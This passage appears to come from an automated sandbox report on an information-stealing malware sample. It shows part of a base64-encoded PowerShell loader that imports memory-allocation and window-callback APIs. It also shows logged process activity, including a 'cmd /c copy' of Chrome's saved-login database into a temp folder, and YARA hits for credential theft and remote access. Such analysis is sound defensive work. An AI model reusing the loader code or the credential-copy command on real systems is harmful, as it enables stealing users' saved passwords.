HMAIABIAGEAbgBkAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEgAYQBuAGQAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBNAEEATABJAEcALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAsAHIAZQBmACAASQBuAHQAMwAyACAASABhAG4AZABsACwAaQBuAHQAIABCAG8AcgBkAHMAawA2ACwAaQBuAHQAIABIAGEAbgBkAGwANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABEAEEAVQBHAEgAVABFAFIALAB1AGkAbgB0ACAAVABhAG4AegBhAG4AaQA1ACwAaQBuAHQAIABoAGEAYQBuACwAaQBuAHQAIABIAGEAbgBkAGwAMAAsAGkAbgB0ACAARgBhAGwAbABhAGMAaQBlAHMANQAsAGkAbgB0ACAAQ
gBHAEUAUgAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAwACwAdQBpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgAxACwASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAAbQBlAHQAYQB0AGUAZwBuADMALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABtAGUAdABhAHQAZQBnAG4ANQAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADYALABpAG4AdAAgAG0AZQB0AGEAdABlAGcAbgA3ACwAaQBuAHQAIABtAGUAdABhAHQAZQBnAG4AOAAsAGkAbgB0ACAAbQBlAHQAYQB0AGUAZwBuADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAVgBlAGoAcgBmAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES843C.tmp" "c:\Users\user\AppData\Local\Temp\lmt3yvf4\CSC3B7445246D634A3891EBDF5913136B1.TMP"
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp, smartscreen.exe, 00000025.00000002.892004316.00000269355B0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.739199824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.728941774.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.716350239.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.741324415.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.698522282.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.748100081.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.707314759.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp, explorer.exe, 00000021.00000003.853429255.00000000050D7000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.863772937.00000000050D2000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.865096113.00000000053D0000.00000004.00000001.sdmp, smartscreen.exe, 00000025.00000002.892004316.00000269355B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000019.00000000.739199824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.715467912.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000019.00000000.698036183.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000019.00000000.716350239.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.698522282.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.738642393.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp, explorer.exe, 00000021.00000000.863772937.00000000050D2000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.859197803.00000000011D8000.00000004.00000020.sdmp, explorer.exe, 00000021.00000000.865096113.00000000053D0000.00000004.00000001.sdmp, smartscreen.exe, 00000025.00000002.892004316.00000269355B0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp, smartscreen.exe, 00000025.00000002.892004316.00000269355B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd#327721
Source: explorer.exe, 00000019.00000000.739199824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.716350239.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.698522282.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000019.00000000.739199824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.716350239.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.698522282.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality

Source: Yara match File source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY